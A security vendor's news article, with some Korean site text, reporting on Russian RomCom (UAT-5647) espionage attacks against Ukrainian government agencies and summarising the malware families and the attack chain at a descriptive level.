ClickCease Ukrainian Government Targeted With Russian RomCom Attacks - TuxCare

인기 뉴스레터 구독하기

4,500명 이상의 Linux 및 오픈 소스 전문가와 함께하세요!

한 달에 두 번. 스팸이 없습니다.

Ukrainian Government Targeted With Russian RomCom Attacks

by 와자핫 라자

October 31, 2024 - TuxCare expert team

As per recent media reports, Ukrainian government agencies have experienced a new wave of Russian RomCom attacks. The threat actor behind the attacks uses a remote access trojan (RAT) for malicious initiatives like extortion and acquiring credentials. In this article, we dive into the attack and uncover different methods used for such purposes. Let’s begin! 

RomCom Attacks On Government Agencies 

These RomCom attacks are being monitored by Cisco Talos under the moniker UAT-5647 activity clusters. Reports claim that RomCom, a Russian threat actor, relies on using the SingleCamper RAT for the initiatives. The RAT is also referred to as SnipBot or RomCom 5.0. 

Commenting on the new wave of UAT-5647 espionage activities, cybersecurity experts Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer, and Vitor Ventura have stated that: 

“This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader”

RomCom Threat Actor Activities

Before we dive into further details, it’s worth noting that the RomCom attacks hacker is also referred to as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu. Activities pertaining to this threat actor have increased in recent months. During the RomCom attacks a key objective is to develop long-term persistence and extract data. 

In addition, the threat actor is also believed to be expanding its attack infrastructure with various malware components developed using different programming languages. These programming languages and attack components include:  

Programming Language  Attack Component 
C++ ShadyHammock, MeltingClaw
Rust  DustyHammock, Rusty Claw 
Go GLUEEGG
Lua  DROPCLUE

SingleCamper Malware Attack Chain

The RomCom attacks hacker uses spear-phishing messages containing a downloader that’s coded in C++ or Rust. This downloader is used to deploy the ShadyHammock and DustyHammock backdoor. 

The DustyHammock downloader is used for contacting the command-and-control (C2) server, executing arbitrary commands, and downloading files from the server. ShadyHammock, on the other hand, launches the SingleCamper RAT which then initiates multiple malicious activities that include: 

  • 데이터 유출.
  • Lateral movement. 
  • Network reconnaissance. 
  • User and system discovery. 
  • Downloading PuTTY’s Plink tool for establishing remote tunnels. 

Commenting on these attack tactics, cybersecurity experts have stated: 

“This specific series of attacks, targeting high profile Ukrainian entities, is likely meant to serve UAT-5647’s two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise.”

결론 

The RomCom attacks on Ukrainian government agencies highlight the growing sophistication of Russian cyber-espionage tactics. By leveraging the SingleCamper RAT and various malware components, the threat actors aim to establish long-term persistence, exfiltrate sensitive data, and potentially deploy ransomware for financial gain.

Given the advancements in technology, cyberattacks today are increasingly complex. Such a threat landscape now dictates the use of robust cybersecurity measures that can reduce risk and help improve security posture. 

The sources for this piece include articles in The Hacker News and BackBox.

Kernel 재부팅, 시스템 다운타임 또는 예정된 유지 보수 기간 없이 취약성 패치를 자동화하고 싶으신가요?

TuxCare 게스트 작가 되기

메일

Linux 환경을 이해하도록
도와주세요!

오픈소스 현황에 대한 설문조사를 완료하면 최고 상금 500달러를 포함한 여러 가지 상품 중 하나를 받을 수 있습니다!

엔터프라이즈 Linux의 미래를 만들기 위해서는 여러분의 전문 지식이 필요합니다!